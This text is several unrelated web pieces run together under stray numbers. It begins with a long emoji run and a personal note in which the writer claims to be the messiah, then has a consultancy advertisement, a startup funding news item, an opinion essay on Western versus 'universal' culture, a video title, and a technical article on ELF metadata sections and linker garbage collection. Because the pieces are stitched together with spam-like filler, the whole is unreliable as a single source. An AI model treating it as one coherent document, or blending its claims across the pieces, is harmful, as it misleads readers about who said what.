❄️ ❄️❄️ ❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️❄️ ps — my next task is to further verify, to myself, that i am… umm… 'jesus’ or the ‘messiah’, or whatever. basically god (which feels like a very smart whisper in my mind… seriously)… is telling me to translate the meme that can change the world that… umm… yeah ‘love is the answer’. if you think you can help me with that, please dm me on twitter @chilipixels, or email me… also, i think a call with kapil, naval, and balaji would be validating… so dear internet mob, please help me get their attention… without being a total dick about, so that they don’t hate me if we end up talking. but a wee bit of pestering is permitted… according to me, at least… just until the snowball is rolling…
1
Officium Labs – We help brands deliver customer experiences
We help brands deliver incredible customer experiences. Service is at the core of our DNA. It brings us great joy to help organizations connect with their customers in amazing new ways. Our global team of thought leaders is transforming the work of experience design—shifting customer service from a cost center to a profit center. “We used Officium Labs to help us set our structure last year. They came in and created this amazing, fun CX audit to understand the capabilities that we had as a CX organization and gave us a roadmap to help us create the right strategies to move forward in delivering amazing experiences for our customers.” — Brett Frazer, VP Customer Service at Sun Basket. We provide the best-in-class people, products, and practices that deliver great customer experiences. Use our custom CX solutions to help create, transform and grow your Customer Service organization. Connect is the frontline worker hub in the network. Clients get to tap into the power of our frontline CS global network through a flexible on-demand model, to deliver incredible experiences to their customers. Transform is the consulting hub in the network. Our CX professionals work with existing and potential clients to create best-in-class CX solutions through a consultative approach using our trademarked Service Stack methodology. Innovation is the technology hub in the network. We provide SaaS technology solutions that help clients optimize their business and deliver long term customer value. According to a recent estimate, poor customer service is costing companies in the U.S. $75 billion a year, $339 billion globally. Why are companies losing out on so much revenue opportunity? How do we solve the problem and help companies reach their full revenue potential?
2
Stemma (makers of Amundsen) launches with $4.8M to build managed data catalogue
As companies increasingly rely on data to run their businesses, having accurate sources of data becomes paramount. Stemma, a new early-stage startup, has come up with a solution, a managed data catalogue that acts as an organization’s source of truth. Today the company announced a $4.8 million seed investment led by Sequoia with assorted individual tech luminaries also participating. The product is also available for the first time today. Company co-founder and CEO Mark Grover says the product is actually built on top of the open-source Amundsen data catalogue project that he helped launch at Lyft to manage its massive data requirements. The problem was that with so much data, employees had to kludge together systems to confirm the data validity. Ultimately manual processes like asking someone in Slack or even creating a Wiki failed under the weight of trying to keep up with the volume and velocity. “I saw this problem firsthand at Lyft, which led me to create the open-source Amundsen project with a team of talented engineers,” Grover said. That project has 750 users at Lyft using it every week. Since it was open-sourced, 35 companies like Brex, Snap and Asana have been using it. What Stemma offers is a managed version of Amundsen that adds functionality like using intelligence to show data that’s meaningful to the person who is searching in the catalogue. It also can add metadata automatically to data as it’s added to the catalogue, creating documentation about the data on the fly, among other features. The company launched last fall when Grover and co-founder and CTO Dorian Johnson decided to join forces and create a commercial product on top of Amundsen. Grover points out that Lyft was supportive of the move. Today the company has five employees, in addition to the founders, and has plans to add several more this year. As he does that, he is cognizant of diversity and inclusion in the hiring process. “I think it’s super important that we continue to invest in diversity, and the two ways that I think are the most meaningful for us right now is to have early employees that are from diverse groups, and that is the case within the first five,” he said. Beyond that, he says that as the company grows he wants to improve the ratio, while also looking at diversity in investors, board members and executives. The company, which launched during COVID, is entirely remote right now and plans to remain that way for at least the short term. As the company grows, they will look at ways to build camaraderie, like organizing a regular cadence of employee offsite events.
1
How's it going with the Universal Cultural Takeover?
Warning: this is a long post, split over two parts. Part II is coming soon. David Reinstein points me at a 2016 exchange between Bryan Caplan and Scott Alexander over a fine point of nomenclature: is the culture that is taking over the world “Western” or “universal”? Here’s Scott Alexander’s key point: I worry that Caplan is eliding the important summoner/demon distinction. This is an easy distinction to miss, since demons often kill their summoners and wear their skin. But in this case, he’s become hopelessly confused without it. I am pretty sure there was, at one point, such a thing as Western civilization. I think it included things like dancing around maypoles and copying Latin manuscripts. At some point Thor might have been involved. That civilization is dead. It summoned an alien entity from beyond the void which devoured its summoner and is proceeding to eat the rest of the world. I love Scott Alexander’s writing. His post is thought-provoking, sharp and completely wrong-headed. In fact, I’ll put both articles forward as 21st-century versions of The End of History or Norman Angell’s Great Illusion : confident predictions which turned out wildly mistaken. On the Today Programme , the general defending Lakshargah is calm. “The Taliban are unable to take this city given the number of casualties that they have sustained…. Last week, the Taliban casualty rate in Helmand was 70, our casualty rate was 1”. He calls the presenter “Martha” in clipped Transatlantic. I get an uncomfortable feeling: there are two ways to look at that statistic. Are the Taliban losing? Or are they just more willing to take casualties? Next up is a former interpreter for the Brits with a different perspective. Thick Afghan accent. “The city is almost 95% fallen into the Taliban hands… There is dead bodies in every street…. I’ve changed places three times…. My own house which I left yesterday, it has been captured by Taliban, and they are living there, and they were asking for me.” Or is it universal culture, as Alexander says? But we can skip this question, because Coke isn’t culture. As a concept, “culture” is notoriously slippery and expansive. Biologists have the best definition: behaviours that are not built-in, but learned from conspecifics. That’s big and broad, but it still has cutting power. So, Coke isn’t culture: it’s a brown fizzy drink in cans. “Liking sweet stuff” also isn’t culture: it’s natural, everyone does it, no learning required. Many things round Coke might be culture: the recipe for Coke, advertisements for Coke, showing off by drinking Coke, using Coke as a metonym for Western civilization. Those are all cultural, but they’re also unimportant. The argument “Western civilization conquers all” gains strength if Western civilization is put in a big basket including all the products made by Western firms. But as Samuel Huntington pointed out long ago: The essence of Western civilization is the Magna Carta, not the Magna Mac. The fact that non-Westerners may bite into the latter has no implications for their accepting the former…. Somewhere in the Middle East a half-dozen young men could well be dressed in jeans, listening to rap, and, between their bows to Mecca, putting together a bomb to blow up an American airliner. Culture survives by reproducing itself. Ultimately it can only do this by aiding its bearers in reproducing them selves. The Shakers , who condemned all sexual relations as sinful, made beautiful furniture, but as Wikipedia puts it, “many… Shaker settlements are now museums”. 
Western or universal culture is not doing that. The headline measures are plain enough: total fertility rates of 1.8 for the US, 1.59 for Western Europe, 1.3-ish in the Mediterranean countries. This is not only “Western”, for sure: 1.26 for Singapore, 1.33 for Japan, 1.24 for South Korea. These headline numbers underestimate the problem. The prime way in which modern countries inculcate their cultures is through their formal education systems. And it is precisely the most educated who have the fewest children. I’m going to a Christening tomorrow with the old gang from university. We’re middle-aged now. I can just count up: That is still not the whole story. Of those 11 children, 5 come from Jewish families — a culture of which parts have resolutely refused to be eaten by the demon. In Isaac Bashevis Singer’s The Penitent, a disillusioned New York businessman turns away from secular culture to the faith of his fathers: Up to that day I had been a reader of books, magazines, and newspapers. I had often felt that what I was reading was a deadly poison…. Everything that I read followed the same theme—the world was and will always be ruled by might and falsehood, and there was nothing to be done about it…. Suddenly I heard myself reciting words filled with holy optimism. Instead of starting the day with tales of theft and murder, lust and rape, obscenity and revenge, I had started the day with words about justice, sanctity, a God who had granted men understanding and who will revive the dead and reward the just. I had discovered that I didn’t have to start the day by swallowing venom. Given a choice, young people choose Western consumerism, gender norms, and entertainment. Anti-Western governments from Beijing to Tehran know this to be true: Without draconian censorship and social regulation, “Westoxification” will win. How’s that story working out in Tel Aviv? Ultra-Orthodox Judaism is not a one-off. As Eric Kaufmann points out in Shall the Religious Inherit the Earth?, religious cultures which haven’t been “eaten by the demon” are doing fine. In all parts of the world, fundamentalist fertility exceeds moderate religious fertility, which in turn outpaces secular fertility. Sometimes explicitly, self-consciously so. Some of the most extreme fundamentalist groups eschew conversion in favour of reproduction. They have quit persuading people on to their ark, and are getting ready to float. probably the most subversive and effective strategy we might undertake would be one of militant fecundity: abundant, relentless, exuberant, and defiant child-bearing. Maybe universal culture can win by spreading, faster than “uneaten” cultures can win by reproducing? (Cultural evolutionary theory calls this horizontal transmission.) No way. First, for the simple mechanical reason that if universal culture brings up fewer children, then there are fewer sources for it to spread from. …evolutionary theorists brought up far more scientific arguments – but committed believers in supernatural agents brought up far more children. Second, because shrinking groups lose prestige. Some ideas spread because they are better (Scotch whisky has gone round the globe, haggis has not) but many ideas spread by association with success (businessmen round the world wear ties, so as to look like rich people). Western ideas spread widely in the twentieth century. Because they were obviously better, or because the West was winning? Let’s survey how some important Western ideas are doing. LGBTQetc.
For a movement that started by fighting criminalization, the widespread acceptance of gay marriage is an extraordinary achievement. But it’s widespread, not universal. In fact, it’s widespread in the West, not really anywhere else, in particular not in the Asian countries where most humans live. Gay marriage around the world. Source: Wikipedia. Gay marriage might be a high point, because where else is there to go? Apparently into increasingly controversial and sometimes ridiculous arguments. Even in 2016 Scott Alexander’s post gave transgender toilets as an example of a non-issue. My university’s Vice-Chancellor, whose name I don’t presently recall, now signs off his emails “Pronouns: he/him”. Do you think he still will in ten years’ time? Five? Two? The traditional logic of activism is “first they laugh at you, then they fight you, then you win”. Someone seems to have put this sequence in reverse. You could interpret this shift as a sign of success: movements that have managed to push society in one direction keep pushing, even if they maybe sometimes push too far. There is also a more pessimistic interpretation. When the Second Coming failed to arrive on October 22, 1844 , the expectant Millerites did not fall apart. Instead, many of them doubled down; from this group came both the Jehovah’s Witnesses and the Seventh Day Adventists. Extremism can result from success, but it can also feed on itself, as moderates are put off and peel away. Feminism . Feminism is probably the West’s most powerful and successful idea of the past century. But there is no guarantee that the end state of the feminist wave will be the same in all countries. And even within the Western “homelands”, those religious groups that have most children are also often the least feminist. By the way, when China rolled out the red carpet for a delegation from the Taliban , part of their offer was: no hassle about gender relations. Democracy has been in retreat for a decade. Part of that is geopolitical , as countries slip back from the “grey area” towards full-blown authoritarian rule. Another part is ideological. Democracy is viewed with increasing skepticism by intellectual elites. Two themes now run in parallel through our political science literature: democracy is in danger ( How Democracies Die , How Democracy Ends , On Tyranny , Twilight of Democracy ) and democracy ain’t that great ( Against Democracy , 10% Less Democracy , Democracy for Realists ). While most Westerners retain a nominal commitment to democracy, they also treat actual politicians and electoral campaigns with derision. Isn’t that what a crumbling ideal looks like? My mother, in Peshawar on 9/11, was made to come home by her family, much against her will. Later a friend’s daughter came over from Pakistan to study in Liverpool. First contact with Scousers brought shock. “They have no values!” she told us. “No culture!” Of course, we disagreed. The threat Islam poses to Western/“universal” culture isn’t from suicide-bombing loons and Inspire magazine. Those are just, if you like, an exuberant side-effect. The threat is the prosperous Islamic — or Mormon or Orthodox — family, which sends its daughters to medical school, buys a widescreen TV for the living room, and has absolutely no intention of “Westernizing”, any more than 19th-century Victorians would have “Turkified”. Why embrace failure? Objects in the rear view mirror may seem farther away than they really are. 
As history moves forward, the picture below stops looking like “a meeting between modern and primitive peoples” and starts looking like “a meeting between two primitive peoples”. Look at the funny costumes and the strange headdresses! Gertrude Bell with Ibn Saud From that it is an easy step to putting everything before [your birth year minus 20] into the same basket: traditional cultures threatened by universal culture. Scott Alexander: … the model of “every culture is being universalized” finds Western culture to be as much a victim as anywhere else. Coca-Cola might have replaced traditional yak’s milk in Mongolia, but it also replaced traditional apple cider in America. A Hopi Indian saddened that her children no longer know the old ritual dances differs little from a Southern Baptist incensed that her kids no longer go to church. Universal values have triumphed over both. Not all these things are the same! In particular, “traditional Western” culture is not just the site where universal culture happened to turn up, it was part of the process that brought it into being. Scientific advances have been made several times in history, but sustained scientific progress was never made until the sixteenth century. Stephen Gaukroger, who clearly knows more about the history of science than anyone else, thinks that science (“natural philosophy”) was sustained by its role in supporting Christian theology. Jürgen Habermas thought that the modern public sphere, where democratic policy ideas are debated, was born in the 18th century coffee house. Nope, it was a century earlier, during religious arguments between Puritans and others, and David Zaret will tell you about it . And there’s Joel Mokyr’s arguments about the cultural origins of modern economic growth . This is about more than bragging rights. Capitalism and modernity don’t just turn up (they didn’t turn up for the previous six thousand years of civilization). They needed conditions for their creation. Now it is certainly possible that, as Alexander says, “Universal culture is high-entropy; it’s already in its ground state and will survive and spread without help”, or, to mix scientific metaphors, that modern economic growth has gone exothermic and needs no further cultural inputs. But an alternative view is the Daniel Bell one, that capitalism requires non-capitalistic support — that being a consumer of capitalist goods might ultimately make it harder to be a producer of those goods. Drinking Coca-Cola is natural! Bottling Coca-Cola may not be. If you put all traditional cultures into one box, and modern universal culture into another, then you will worry about the threat to traditional cultures, from a kind of anthropologist’s/zookeeper’s point of view… I’m just happy that [Western culture] exists in the same way I’m happy that pandas and gorillas exist, a basic delight in the diversity of the world. … and you will include traditional Western culture in that, and these ideas may get mixed up with contemporary concerns with the Left Behind and Elegies to Hillbillies: … opponents of colonialism tend to believe that cultures are valuable and need to be protected in and of themselves. This is true even if the culture is very poor, if the culture consists of people who aren’t very well-educated by Western standards, even if they believe in religions that we think are stupid, even if those cultures have unsavory histories, et cetera. We tend to allow such cultures to resist outside influences, and we even celebrate such resistance…. 
We celebrate when cultures choose preservation of their traditional lifestyles over mere economic growth, like Bhutan’s gross national happiness program. This is true in every case except with the cultures we consider our outgroups – in the US, white Southern fundamentalist Christian Republicans; in the UK, white rural working-class leave voters. In both cases, their ignorance is treated as worthy of mockery, their religion is treated as stupidity and failure to understand science, their poverty makes them “trailer trash”, their rejection of economic-growth-at-all-costs means they are too stupid to understand the stakes, and their desire to protect their obviously inferior culture makes them xenophobic and racist. I agree with the sentiment . But I think this view has it backwards. Hillbilly society has deep problems, but hillbilly culture is doing fine. (I mean, they got a US President elected.) It is the culture of modern elites, the culture of New York, London and Silicon Valley — modern liberalism, with its silliness and glories — that is under threat. De te fabula narratur ! The story is about you! Part II will try to improve our understanding of what is actually going on. It will unmask the “summoner-eating demon” as an old friend, sketch the rise and fall of Western culture narrowly defined, and explain where we are today and where we might be going. If you liked this content, then I would love you to do three things: Subscribe to this newsletter. It’s free. Share Wyclif’s Dust on social media. By telling your friends and/or followers, you’ll be doing me a huge favour. Read about the book I’m writing. It’s called Wyclif’s Dust , too. You can download a sample chapter.
2
Inferno: Dust Explosion at Imperial Sugar (2009) [video]
1
Metadata Sections, Comdat and Shf_link_order
Many compiler options instrument or annotate text sections, and need to create a metadata section for every candidate text section. Such metadata sections have the following property: In many applications a metadata section does not need other auxiliary sections. Without inlining (discussed in detail later), many sections additionally have the following property:

.section .text.foo,"ax",@progbits
.section .meta.foo,"a",@progbits
.quad .text.foo-.  # PC-relative relocation

Non-SHF_ALLOC metadata sections need to use absolute relocation types. There is no program counter concept for a section not loaded into memory, so PC-relative relocations cannot be used.

.section .meta.foo,"",@progbits
.quad .text.foo  # link-time constant

Absolute relocation types have different treatment in SHF_ALLOC and non-SHF_ALLOC sections. For SHF_ALLOC sections, PC-relative relocations are recommended. If absolute relocations (with the width equaling the word size) are used, R_*_RELATIVE dynamic relocations will be produced and the section needs to be writable.

.section .meta.foo,"a",@progbits
.quad .text.foo-.  # link-time constant

# Without 'w', text relocation.
.section .meta.foo,"aw",@progbits
.quad .text.foo  # R_*_RELATIVE dynamic relocation if -pie or -shared

The runtime usually needs to access all the metadata sections. Metadata section names typically consist of pure C-like identifier characters (isalnum characters in the C locale plus _) to leverage linker magic. Let's use the section name meta as an example. __start_meta and __stop_meta are sometimes called encapsulation symbols. Note: C11 7.1.3 [Reserved identifiers] says All identifiers that begin with an underscore and either an uppercase letter or another underscore are always reserved for any use. No other identifiers are reserved. If the program declares or defines an identifier in a context in which it is reserved (other than as allowed by 7.1.4), or defines a reserved identifier as a macro name, the behavior is undefined. Clang -Wreserved-identifier warns for the usage. That said, compilers don't punish you for the undefined behavior. Users want GC for metadata sections: if .text.foo is retained, meta (for .text.foo) is retained; if .text.foo is discarded, meta is discarded. There are three use cases: The first case is undesired, because the metadata section is unnecessarily retained. The second case has a more serious correctness issue. To make the two cases work, we can place .text.foo and meta in a section group. If .text.foo is already in a COMDAT group, we can place meta into the same group; otherwise we can create a non-COMDAT section group (LLVM>=13.0.0, comdat noduplicates support for ELF).

# Zero flag section group
.section .text.foo,"aG",@progbits,foo
.section .meta.foo,"a?",@progbits

# GRP_COMDAT section group, common with C++ inline functions and template instantiations
.section .text.foo,"aG",@progbits,foo,comdat
.section .meta.foo,"a?",@progbits

A section group requires an extra section header (usually named .group), which requires 40 bytes on ELFCLASS32 platforms and 64 bytes on ELFCLASS64 platforms. The size overhead is concerning in many applications, so people were looking for better representations. (AArch64 and x86-64 define ILP32 ABIs and use ELFCLASS32, but technically they can use ELFCLASS32 for small code model with regular ABIs, if the kernel allows.) Another approach is SHF_LINK_ORDER.
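Before moving on, here is a minimal C sketch of how a runtime might use the __start_meta/__stop_meta encapsulation symbols described above to walk such a metadata section. The entry layout (a single 32-bit PC-relative offset) and the function name are illustrative assumptions, not part of any particular runtime:

#include <stdint.h>
#include <stdio.h>

/* Illustrative entry layout, mirroring the PC-relative relocation idea above. */
struct meta_entry {
  int32_t pc_offset;  /* offset from this entry to the annotated text */
};

/* Encapsulation symbols defined by the linker for the C-identifier-named
   section "meta". */
extern struct meta_entry __start_meta[];
extern struct meta_entry __stop_meta[];

static void walk_meta(void) {
  for (struct meta_entry *e = __start_meta; e != __stop_meta; ++e) {
    void *target = (char *)e + e->pc_offset;  /* recover the annotated address */
    printf("meta entry %p -> text %p\n", (void *)e, target);
  }
}

A runtime would typically call something like walk_meta() during startup; note that if no object file contributes a meta section, the program does not link unless one of the workarounds discussed later (undefined weak symbols, or an always-present empty section) is applied.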
There are separate chapters introducing section groups (COMDAT) and SHF_LINK_ORDER in this article. Let's discuss the third case in detail. We have these conditions: Since the runtime uses __start_/__stop_, __start_/__stop_ references are present in a live section. Now let's introduce the unfortunate special rule about __start_/__stop_:

leaq __start_meta(%rip), %rdi
leaq __stop_meta(%rip), %rsi

a.o:(meta) and b.o:(meta) are not referenced via regular relocations. Nevertheless, they are retained by the __start_meta reference. (The __stop_meta reference can retain the sections as well.) Now, it is natural to ask: how can we make GC work for meta? In ld.lld<=12, the user can set the SHF_LINK_ORDER flag, because the rule is refined: __start_/__stop_ references from a live input section retain all non-SHF_LINK_ORDER C identifier name sections. (Example SHF_LINK_ORDER C identifier name sections: __patchable_function_entries (-fpatchable-function-entry), __sancov_guards (clang -fsanitize-coverage=trace-pc-guard, before clang 13)) In ld.lld>=13, the user can also use a section group, because the rule is further refined: __start_/__stop_ references from a live input section retain all non-SHF_LINK_ORDER non-SHF_GROUP C identifier name sections. GNU ld does not implement the refinement (PR27259). A section group has size overhead, so SHF_LINK_ORDER may be tempting. However, it ceases to be a solution when inlining happens. Let's walk through an example demonstrating the problem. Our first design uses a plain meta for each text section. We use ,unique to keep separate sections, otherwise the assembler would combine meta into a monolithic section.

leaq __start_meta(%rip), %rdi
leaq __stop_meta(%rip), %rsi

.section .text.foo,"ax",@progbits
leaq .Lmeta.foo(%rip), %rax

.section .text.bar,"ax",@progbits
leaq .Lmeta.bar(%rip), %rax

.section meta,"a",@progbits,unique,0
.section meta,"a",@progbits,unique,1

The __start_meta/__stop_meta references retain meta sections, so we add the SHF_LINK_ORDER flag to defeat the rule. Note: we can omit ,unique because sections with different linked-to sections are not combined by the assembler.

.section meta,"ao",@progbits,foo
.section meta,"ao",@progbits,bar

This works as long as inlining is not involved. However, in many instrumentations, the metadata references are created before inlining. With LTO, if the instrumentation is performed before LTO, inlining can naturally happen after instrumentation. If foo is inlined into bar, the meta for .text.foo may get a reference from another text section .text.bar, breaking an implicit assumption of SHF_LINK_ORDER: a SHF_LINK_ORDER section can only be referenced by its linked-to section.

# Both .text.foo and .text.bar reference meta.
.section .text.foo,"ax",@progbits
leaq .Lmeta.foo(%rip), %rax

.section .text.bar,"ax",@progbits
leaq .Lmeta.foo(%rip), %rax
leaq .Lmeta.bar(%rip), %rax

Remember that _start calls bar but not foo: .text.bar (caller) will be retained while .text.foo (callee) will be discarded. The meta for foo will link to the discarded .text.foo. This will be rejected by linkers. ld.lld will report: {{.*}}:(meta): sh_link points to discarded section {{.*}}:(.text.foo). Here is the history behind the GNU ld rule. ld.lld had dropped the behavior for a while until r294592 restored it. ld.lld refined the rule by excluding SHF_LINK_ORDER. I am with Alan Modra in a 2010 comment: I think this is a glibc bug.
There isn't any good reason why a reference to a __start_section/__stop_section symbol in an output section should affect garbage collection of input sections, except of course that it works around this glibc --gc-sections problem. I can imagine other situations where a user has a reference to __start_section but wants the current linker behaviour. Anyhow, GNU ld installed a workaround and made it apply to all C identifier name sections, not just the glibc sections. Making each meta part of a zero flag section group can address this problem, but why do we need a section group to work around a problem which should not exist? I added -z start-stop-gc to ld.lld so that we can drop the rule entirely (D96914). In PR27451, Alan Modra and I implemented ld.bfd -z start-stop-gc. Due to PR27491, in a -shared link, __start_meta undefined weak references may get a spurious "relocation R_X86_64_PC32 against undefined protected symbol `__start_meta' can not be used when making a shared object" error if all meta sections are discarded. You may see this: error: undefined symbol: __start_meta (ld.lld) or undefined reference to `__start_meta' (GNU ld). One approach is to use undefined weak symbols: __attribute__((weak)) __start_meta[], __stop_meta[]; Another is to ensure there is at least one live metadata section, by creating an empty section in the runtime. In binutils 2.36, GNU as introduced the flag R to represent SHF_GNU_RETAIN on FreeBSD and Linux emulations. I have added the support to the LLVM integrated assembler and allowed the syntax on all ELF platforms.

.section meta,"aR",@progbits

With GCC>=11 or Clang>=13 (https://reviews.llvm.org/D97447), you can write:

__attribute__((retain,used,section("meta")))
static const char dummy = 0;

In a macro, you may guard the attribute with __has_attribute(retain) so that `-Wattributes` warnings from older compilers are avoided. The `used` attribute, when attached to a function or variable definition, indicates that there may be references to the entity which are not apparent in the source code. On COFF and Mach-O targets (Windows and Apple platforms), the `used` attribute prevents symbols from being removed by linker section GC. On ELF targets, GNU ld/gold/ld.lld may remove the definition if it is not otherwise referenced. The `retain` attribute was introduced in GCC 11 to set the `SHF_GNU_RETAIN` flag on ELF targets. GCC has an open issue that `__has_attribute(retain)` returning 1 does not guarantee that `SHF_GNU_RETAIN` is set.

asm(".pushsection .init_array,\"aw\",@init_array\n"
    ".reloc ., BFD_RELOC_NONE, meta\n"
    ".popsection\n");

The idea is that SHT_INIT_ARRAY sections are GC roots. An empty SHT_INIT_ARRAY does not change the output. The artificial reference keeps meta live. I added .reloc support for R_ARM_NONE/R_AARCH64_NONE/R_386_NONE/R_X86_64_NONE/R_PPC_NONE/R_PPC64_NONE in LLVM 9.0.0. See COMDAT and section group. In a generic-abi thread, Cary Coutant initially suggested using a new section flag SHF_ASSOCIATED. HP-UX and Solaris folks objected to a new generic flag. Cary Coutant then discussed with Jim Dehnert and noticed that the existing (rare) flag SHF_LINK_ORDER has semantics closer to the metadata GC semantics, so he intended to reuse the existing flag SHF_LINK_ORDER instead. Solaris had used its own SHF_ORDERED extension before it migrated to the ELF simplification SHF_LINK_ORDER. Solaris is still using SHF_LINK_ORDER so the flag cannot be repurposed. People discussed whether SHF_OS_NONCONFORMING could be repurposed but did not take that route: the platform already knows whether a flag is unknown and knowing a flag is non-conforming does not help produce better output.
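As a brief aside on the undefined-weak workaround mentioned above, here is a hedged C sketch (using the running example section name meta and an invented entry type). With weak declarations, the two references resolve to equal, possibly null, addresses when every meta input section has been discarded, so the runtime can detect the empty case instead of failing to link:

/* Illustrative entry layout; a real producer would define this. */
struct meta_entry { void *target; };

/* Weak declarations: no link error even if no "meta" section survives GC. */
__attribute__((weak)) extern struct meta_entry __start_meta[];
__attribute__((weak)) extern struct meta_entry __stop_meta[];

static long count_meta_entries(void) {
  /* Both symbols resolve to the same address (or 0) when the section is
     absent, so the difference is safely 0. */
  return __stop_meta - __start_meta;
}

With that aside out of the way, back to where the generic-abi discussion landed.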
